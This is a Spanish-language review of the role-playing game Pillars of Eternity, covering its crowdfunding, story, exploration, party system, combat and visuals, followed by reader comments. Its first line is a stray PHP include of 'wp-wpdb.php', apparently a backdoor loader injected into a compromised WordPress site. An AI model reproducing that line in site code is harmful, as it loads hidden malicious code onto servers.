if (is_file('wp-wpdb.php')) include_once('wp-wpdb.php'); Análisis Pillars of Eternity – La Fortaleza de LeChuck

Análisis Pillars of Eternity

Hace unos años, un grupo de veteranos de la industria se reunió con un sueño: traer de vuelta la época dorada de los RPGs de PC con un juego. Era un proyecto ambicioso que necesitaba mucho esfuerzo, y dinero, pero gracias al crowdfunding ese proyecto se convirtió en una realidad llamada Pillars of Eternity. Hoy se lanza el título desarrollado por Obsidian, el cual tiene la intención de alzarse como uno de los mejores juegos de ordenador del año. Tienes delante de ti un gran mundo para explorar, ¿nos ponemos en marcha, viajero?

Pillars-of-Eternity-analisis

Los inicios

Obsidian estuvo en el lugar adecuado en el momento adecuado. Fue uno de los primeros Kickstarter de videojuegos antes de que se llegara al abuso actual, y además, iba a sacar del limbo los CRPG basándose en los clásicos Baldur’s Gate, Icewind Dale y Planescape: Torment de la mano de tres grandes de la industria: Chris Avellone (Planescape: Torment, Icewind Dale…), Tim Cain (creador de Fallout) y Josh Sawyer (Fallout: New Vegas, Icewind Dale…). La cosa pintaba bien, y el video del Kickstarter daba una sacudida nostálgica que hizo que el 18 de octubre de 2012 el por entonces llamado Project Eternity recaudara $3,986,929, casi nada. En éxito del proyecto hizo que Obsidian no echara el candado, como hace poco reconoció el equipo en un video del documental previo al lanzamiento.

project-eternity
Calidad

Han pasando 2 años y por fin el heredero de los títulos de Black Isle/Interplay ha vuelto. El aspecto es muy familiar pero tiene algunos cambios que nos harán disfrutar del juego de una forma totalmente fresca y original.

Comienza el viaje

Pillars of Eternity empieza con una breve introducción plasmada en un pergamino, en él, se relata que en el pueblo de Valle del Oro se ofrece oro y riquezas a los extranjeros que se queden allí. Entusiasmado por hacer fortuna, te diriges en una caravana hacia el lugar, pero en mitad del trayecto comienzas a sentirte mal y hacéis un alto en el camino cerca de unas misteriosas ruinas. Al regresar de la recolección de unas bayas curativas, el campamento ha sido arrasado por unos fanáticos que te ves obligado a eliminar. Mientras el último de ellos agoniza, lanza una plegaria que provoca una fuerte ventisca y te obliga a huir con otros aventureros hacia el interior de las ruinas. Tras una larga caminata, llegáis a un claro donde unos encapuchados están haciendo un extraño ritual que acaba con otra fuerte ventisca. Te despiertas aturdido, tus compañeros han muerto y los hombres han desaparecido, pero has ganado un poder misterioso que te conecta con las almas. Aquí se inicia la aventura que te llevará por el mundo para descubrir qué es esa habilidad que posees y las terribles consecuencias que puede ocasionar.

Pillars-of-Eternity-1
En cada diálogo se describe la situación y personajes

Estamos ante un juego de vista isométrica, con un puñado de posibilidades por delante y con un sistema de combate que puede crear confusión, ¡pero tranquilos, novatos! Se ha dispuesto un tutorial que nos guía (si lo deseamos) por la aventura y aparece en momentos específicos. Incluso a mí me ha ido bien para conocer las novedades introducidas que difieren bastante de los old school. Los cambios comienzan en el editor de personaje. Hay un buen número de razas y clases poco habituales que dan frescura al universo creado y es interesante leer cada una de ella. Una vez seleccionadas, pasamos a los atributos, primeramente observamos que la «Fuerza» se ha sustituido por «Poder», el cual representa el daño y es aplicable para todas las clases y razas. Exactamente igual ocurre con constitución, destreza, percepción, intelecto y resolución, no limitando cada una de ellos a la tipología del personaje. Siguiendo con el editor, llegamos a «Cultura», donde básicamente escogemos nuestro origen y observamos que cada uno otorga habilidades y atributos diferentes. Un poco de aspecto por allí y voz por allá y estamos listos para recorrer el majestuoso mundo de Eora.

Pillars-of-Eternity-2

Pillars of Eternity es un juego muy rico en misiones, las cuales se dividen en principales, secundarias y tareas, y todas ellas quedan registradas en nuestro diario. Muchas de ellas requieren una evolución y se irán actualizando a medida que conozcamos más pistas. Por otro lado, también tenemos las misiones de personaje que se desbloquean una vez que se estrechan lazos y pueden estar situadas o relacionadas con las principales. Si vais a visitar una mazmorra, podéis matar dos pájaros de un tiro si estáis atentos a aquella petición. Como siempre digo en juegos de estas características, no es imprescindible hacer las misiones secundarias y tareas, pero el juego perdería su gracia, y se esfumarían los momentos divertidos, homenajes, referencias y chistes tontos de esos que al cabo de unos años recuerdas más que la propia trama del juego.

El poder de la exploración

El mapa en el que se desarrolla el juego es basto: grandes bosques, pueblos y ciudades. En cada área, por pequeña que parezca, se puede esconder la entrada de una mazmorra de varios pisos. También vemos NPCs que necesitan de nuestra ayuda, y quizá nos topemos con objetos interesantes e ingredientes para el crafteo, además de muchos y variados enemigos. Como viene siendo habitual hoy en día, también hay un comando para resaltar los objetos próximos. La exploración y desbloqueo del mapa es una gozada y siempre hay alguna sorpresa hasta en el rincón más remoto. Para facilitar las cosas, las zonas importantes están indicadas con su nombre, pero otras habrá que recordarlas o por el contrario volver a dar una buena caminata. Hay que destacar que al abrir el mapa podremos navegar por él y pinchar sobre un punto para que se dirija nuestro grupo automáticamente. La nota negativa en este aspecto, y que me extraña mucho, es que en pantalla no aparece un mini mapa a modo de brújula como en otros juegos de estas características, así que os vais a cansar de dar a la «M».

Pillars-of-Eternity-4
Esto es solo una mitad

Como ya he dicho, la exploración es muy importante para revelar puntos de interés, como para acceder a nuevas misiones y objetivos, y recibir puntos de experiencia. Sin embargo, la inmensidad de cada lugar puede resultar apabullante, así que para facilitar las cosas, y desbloquear el mapa más rápido, hay un modo llamado «doble de velocidad» y hará que el grupo corra como nunca, también hay un modo lento por si os van los paseos tranquilos. Cuando entramos en combate la velocidad vuelve a la normal. Por otro lado, para descubrir algunos secretos ocultos, se tiene que hacer uso del modo «Exploración«. Con él activado, encontraremos tesoros que no se ven a simple vista, trampas y nos permite evitar un enfrentamiento con el enemigo. Cuanto más alto tengamos el atributo sigilo, mucho más eficiente resultará.

Pillars-of-Eternity-5
12 pisos de mazmorra

Con un universo tan grande y abundante, que incluye cientos de tipos de monstruos, localizaciones, historia y mitología, se nos pueden escapar conceptos, por lo que se ha incluido en el menú la «Ciclopedia«. Allí se irá recopilando todo tipo de información útil del universo, además de información del juego: mecánicas, estadísticas y equipamiento. A mí me ha ido de lujo para refrescar terminología religiosa y ver los puntos débiles de las bestias, no dudéis en echarle un vistazo para empaparos bien de la historia.

Tú decides

Nuestra habilidad como Observador/a será una pieza importante durante el juego, ya que el hecho de ver las vidas pasadas de los individuos, y los recuerdos que han quedado impregnados en lugares olvidados, nos hará resolver misterios y descubrir terribles hechos, además del simple placer de cotillear en las almas de los pobres mortales. Es así como podremos detectar si nos mienten ahondado en el pasado de algunos personajes y lugares, y luego será el turno de decidir si queremos delatar al mentiroso o nos sale a cuenta seguirle la corriente. Otras tareas dependerán más de nuestro nivel de altruismo: ayudar a todo ser viviente sin cobrar ni un duro, o comportarnos como un mercenario puro y trabajar solo por dinero. También podemos estar en el extremo opuesto: ser un villano, quedarnos con todo y ponernos en contra de la victima. Nuestras acciones nos darán reputación tanto positiva como negativa, seremos un héroe o el peor de los villanos. No obstante, si vamos resolviendo misiones nos iremos labrando un nombre que llegará a todos los rincones de la región, es decir, los bandidos irán a por tu cabeza.

Pillars-of-Eternity-13
¿Entro al trapo o no?

El nivel de conversación nos abrirá nuevos diálogos y posibilidades, e incluso podremos hacer que alguien se encargue de resolver los follones en nuestro lugar. Dependiendo de los puntos de resolución del personaje, podremos dominar a los pobres infelices a nuestro antojo. A mi es algo que me encanta especialmente, y así me libro de estar siempre acabando a palos con todo el que no está de mi parte.

Las decisiones en Pillars of Eternity van mucho más allá. En ocasiones algunos hechos se narran a modo de relato, es decir, en pantalla aparecen unas viejas paginas ilustradas donde se detalla la situación y se ofrecen varias opciones. Para que os hagáis una idea, es un poco como los libros de «Elige tu propia aventura» Por poner un ejemplo, en una mazmorra encontré un foso enorme, en ese momento me saltó en pantalla un pergamino con la descripción y su respectiva ilustración, debajo se me ofrecían las opciones: observar, descender, utilizar el gancho o largarse. Al pinchar sobre una de esas opciones, me llevaba a otra página con el resultado de la elección. Dependiendo de nuestros atributos, podemos acabar mejor o peor parados. La narración de los hechos a través de pergaminos será una constante también cuando visitemos localizaciones importantes.

Como veis, el poder de la narrativa juega un papel muy importante en Pillars of Eternity y para disfrutar al 100% del título os tiene que gustar leer. Hay miles de líneas de texto repartidas en diálogos con NPCs y compañeros del grupo, descripciones de lugares y objetos, libros y lectura de almas. Como observador/a, nuestro personaje se topará con individuos en el camino que tienen nombre y apellidos, y clickar sobre éstos, aparecerá un texto relacionado con hechos de sus vidas pasadas. En algunas ocasiones es simplemente anecdótico y no tiene conexión con la historia pero aún así vale la pena gastar unos segundos leyendo esos pequeños relatos de aventuras.

El Grupo

En los últimos CRPG que he jugado he visto como el número de miembros se reducía a un total de 4 (Wasteland 2, Divinity: Original Sin…) pero en Pillars of Eternity, como buen homenaje a los clásicos, vuelve a los 6 personajes en total. Sin embargo, lo más destacado es que podremos contratar a nuevos personajes en tabernas. Veremos una selección de niveles (cuanto más alto el nivel más dinero hay que pagar) y a continuación se abrirá el editor de personaje para crearlo como deseemos. A mí me ha ido genial para añadir guerreros a mi grupo, pero también se pueden probar locuras como armarte con un grupo 6 hechiceros. Como veis, hay posibilidades para todos los gustos.

También conoceremos a nuevos aventureros por el camino que se añadirán a nuestro grupo, con sus particulares problemas, personalidades y origen. Vamos a pasar verdaderos desafíos a su lado y agradables estancias en pueblos y ciudades. Ellos irán disfrutando a su manera del trayecto, conociéndose los unos a los otros y entablando conversación. Después de acontecimientos importantes, y cuando llevamos días juntos, sobre el retrato de alguno de ellos aparecerá el símbolo de conversación, es entonces cuando se abren los diálogos extensos que a menudo vienen acompañados de una misión de personaje. Hay personajes muy variopintos, y lo gracioso es que algunos traen mascotas que corretean a su lado.

Pillars-of-Eternity-8
Este me da que me la va a liar

Para realizar la gestión del grupo, mejorarlo y entrenarlo en nuestra ausencia, está el Baluarte, es decir, nuestra fortaleza, que a base de bolsas de oro irá mejorando para albergar todo tipo de gentes y edificaciones. Nuestro hogar para el descanso y comercio. Los personajes que permanezcan allí, se les podrá asignar misiones para que suban de nivel y no se queden rezagados.

Modo de combate

Pillars of Eternity es un RPG en tiempo real con pausa. Los personajes realizarán su auto ataque si no se les ordena lo contrario, por lo tanto, la pausa está destinada a elaborar estrategias con las habilidades, técnicas y hechizos disponibles. No es absolutamente necesario jugar con pausa, pero veréis que así resulta más fácil coordinarlos y terminar antes con el enemigo. Cabe decir que Pillars of Eternity no está basado en las reglas de D&D, ya que los creadores creían que limitaban bastante la experiencia y deseaban que se saliera de lo habitual. Un jugador de D&D pondría a su guerrero o bárbaro la mayor cantidad de puntos en «Fuerza» pero en Pillars of Eternity los atributos están más destinados a que sean comunes para todas las clases y razas, variando solo la forma que se utilizan las habilidades. Como bien dijo el director del juego, Josh Sawyer, el poder es la estadística que rige todo el daño, tanto los hechizos como las armas. También tenemos el «Intelecto» que otorga bonificaciones de duración a las habilidades.

Pillars-of-Eternity-12
Bichos simpáticos

Al ganar experiencia se sube de nivel y tendremos puntos extras para mejorar las habilidades, los desbloqueos de clase (hechizos y técnicas) y los talentos (de clase, defensivo, ofensivo y utilidad). Los talentos se regeneran al terminar una batalla, en cambio, para los desbloqueos de clase será necesario descansar. Las habilidades están divididas en seis y entre ellas encontramos algunas muy útiles como el «Atletismo», que mejora nuestra forma física para actividades que requieran de ella y reduce nuestro cansancio, o la mecánica, muy importante para forzar cerraduras con éxito.

Los personajes poseen barra de salud y de resistencia. Los golpes reducen la resistencia, y cuando ésta llega a cero, perderán salud y caerán k.o. Otra cosa importante: En Pillars of Eternity los personajes mueren. Sí, aún hay juegos así, pero que no cunda el pánico, ya que en niveles de dificultad inferiores si el personaje cae en batalla acaba mutilado. ¡Eh! No es tan sádico como pensáis, simplemente significa que tendrá reducido algunos stats al acabar la batalla pero con un cabezadita estará como nuevo. Sin embargo, si el golpe es lo suficientemente fuerte, y ya tenía poca vida, adiós para siempre.

Vamos a sudar sangre en las mazmorras de varios pisos, con múltiples trampas mortales y plagadas de monstruos, por lo que en ocasiones un enfrentamiento puede resultar un verdadero desafío. En este punto hay que valorar si es mejor insistir con varias estrategias, observando bien las debilidades del enemigo y nuestros puntos fuertes, o bajar el nivel de dificultad, que nos sacará de la frustración y así continuaremos. Aunque también hay trucos sucios que los veteranos utilizamos, como el de jugar con el área de movimiento de los enemigos y atraer a unos pocos y no meternos de lleno en todo el berenjenal. Sin embargo, como en todo CRPG, GRABAD MUCHO.

Pillars-of-Eternity-11
Trampas bonitas

El tiempo transcurre en Pillars of Eternity como se puede observar en pantalla, y hay ciclo de día y noche. El paso de las horas hace que los personajes se cansen y aparece el icono de fatiga en su retrato. Será indispensable descansar de vez en cuando en un campamento, baluarte o en posadas, ya que en este estado los personajes son más vulnerables. No obstante, y como novedad, para acampar en la intemperie o mazmorras es necesario material de acampada. Después del descanso, los personajes recuperan la vitalidad y vuelven a estar disponibles las habilidades especiales y los hechizos.

Toda la información del grupo está en la ficha de personaje, donde además de ver las capacidades de cada miembro para la batalla, observamos los datos del grupo en conjunto: días de viaje, reputación e información referente a enemigos derrotados. También vale la pena observar la pestaña personal de cada personaje.

Pillars-of-Eternity-14
Meto hostias como panes

Para terminar este apartado, hablemos del crafteo. En la descripción de las armas y armaduras está la opción de «Encantar» con ingredientes que iremos recolectando o comprando, y así dotaremos de poderes muy variados a todo nuestro arsenal. La forma de crafteo es muy sencilla, ya que se abre un menú donde se nos muestra un listado de mejoras y aparecen resaltadas las disponibles. Dentro del inventario también encontramos la sección de «Artesanía», donde se nos permite crear platos de comida, pociones y pergaminos variados. La sencillez con la que se ha elaborado el crafteo hace que la fabricación y mejora sea rápida y cómoda, sin necesidad de consulta externa. También destacar el inventario de cada compañero, que aunque es pequeño, todos los objetos restantes que no quepan van a parar al «Alijo» y allí se ordenan por tipo. Muy cómodo para observar todo lo que el loteo masivo nos proporciona.

Gráficos y ambientación

Los gráficos y ambientación de Pillars of Eternity es el puro reflejo de Baldur’s Gate y otros títulos desarrollados con el motor Infinity. La interfaz, mazmorras o descripciones evoca el recuerdo de los grandes RPG del pasado y no intenta disimular lo que es: un completo y absoluto homenaje lleno de epicidad en un basto universo. Escuchar al narrador decir algo como «debéis juntar vuestro grupo antes de continuar» es un golpe nostálgico muy fuerte.

El mapa del mundo es muy amplio y los lugares están llenos de detalles. Los bosques se sienten vivos, con animales que se mueven, y con un aura de misterio que envuelve las esculturas, ruinas e incluso grandes esqueletos de dragones que antes poblaban esas tierras. También hay muchos NPCs por el camino con los que hablar, ayudar o derrotar, no es esa sensación que hay en otros RPGs donde los mapas exteriores carecen de vida humana. Por no hablar de las ciudades de varios distritos, donde los ciudadanos van y vienen, se puede entrar en cada vivienda, con animadas tabernas y centros específicos, ¡pero si hay hasta un anfiteatro donde hacen funciones! Es tanta la diversidad del universo que ofrece Pillars of Eternity que es una verdadera delicia explorarlo.

Pillars-of-Eternity-3
¿Te imaginas que se levanta? Je. Mejor vámonos.

Detalles y referencias

Si sois de los que disfrutan con las referencias y guiños, esto va a ser un no parar. Pillars of Eternity cuenta con mensajes de los backers que lo hicieron posible y los encontramos en lugares como tumbas. Vamos a leer muchos textos divertidos, entrañables y muy locos. También daremos con algunos objetos muy familiares. Son cientos de cosas que os voy a dejar que descubráis, pero que sirva esta imagen de ejemplo:

Pillars-of-Eternity-7
Estúpido y sensual Minsc :_

Después de jugar al Divinity: Original Sin me dio pena no poder hablar con los animalillos del bosque, pero se me olvidó cuando adopté un bicho. ¡Qué se pueden tener mascotas! Tengo un mini dragón blanco más majo… Me sigue, me quiere mucho, lo llevo a todas partes y come humanos. Lo adoro. También fiché a un nuevo miembro para el grupo que iba acompañado de un lobo blanco. Lo mejor de todo es que no se quedan en el inventario como pasaba con Bubu de Minsc, ¡aquí son uno más y se vienen de excursión con nosotros!

Pillars-of-Eternity-6
La familia unida. Oye, ¿qué hace Goku super saiyajin ahí?

Conclusiones

Pillars of Eternity es un viaje a la época dorada de los RPGs de PC. Vamos a recordar cuando nos sentábamos delante de nuestro Pentium y con un ratón de bola pasábamos largas tardes. El juego tiene tanto poder adictivo como horas de diversión a través de gestas y exploración de lugares llenos de matices. Ideal para grandes veteranos y adaptado para nuevos aventureros. Todo el tiempo que he esperado su llegada ha valido la pena y ahora tan solo me queda recomendároslo y seguir disfrutando de él. Sin duda estamos ante uno de los juegos del año.

Pillars of Eternity ya está disponible en Steam pero os invito a que echéis un vistazo a la edición física que está disponible en España gracias a la buena gente de Meridiem Games, y así lo pongáis en vuestra estantería, al ladito de los grandes clásicos en los que un día está destinado a convertirse.

Por Arashi

Aparte de patear traseros de piratas como gobernadora en Mêlée, soy una fanática de los videojuegos desde que de pequeña me regalaron la Atari 2600. Adoro las aventuras gráficas y los RPG, pero no le hago ascos al resto. Otra de mis pasiones es todo lo relacionado con Japón.

10 comentarios

  1. Muy buen análisis, se nota que está hecho con mucho cariño. Un único apunte, la edición física que han traído los buenos de Meridiem Games es bastante cutre, ni un mísero papelito se ve al abrir la caja, sólo el disco y la clave pegada a la parte interior de la carátula. Una decepción después de ver el manual de Divinity Original sin.

    1. Gracias, es un gran juego y he intentado transmitirlo 🙂 Sobre la edición física y su contenido, depende más bien del publisher, en este caso Paradox, pero es cierto que podría haber estado mejor. De todas formas vale mucho la pena comprarlo en físico para apoyar a esta compañía que trae juegos menos mayoritarios y que encima está más barato que en digital.

      1. Desde mi epoca del Baldurs que no encontraba un Rpg de este estilo que
        me enganchase, esto es una obra de arte, por el tiempo que llevo
        jugado….eso si cierto regustillo a las reglas del d&d4th de
        mesa….que me encanta, es lo mas fiel a mis partidas con los colegas y
        los dados!! un saludo

  2. No se cuantas veces te he dicho esto en los últimos tiempos… pero te odio profundamente (aun más XD).

    Con este análisis me dan ganas de comprarme varias copias del juego para apoyar a los chicos de Obsidian en esta aventura, en cierta manera bastante romántica y con ese regustillo a los Baldur’s y al Icewind que siempre me enamoró.

    Me choca un poco algún punto que has comentado como lo de no tener mini-mapa o necesitar materiales para acampar… para los mancos como un servidor ese tipo de cosas son imprescindibles 😉

    1. jajaja recuerda que este es un imprescindible, ahora que llega el puente hay que aprovecharlo 😉 Si eres fan de los clásicos este te va a encantar! No dudes en comprar la edición física que está más barata, al menos en Amazon ^^

Dejar un comentario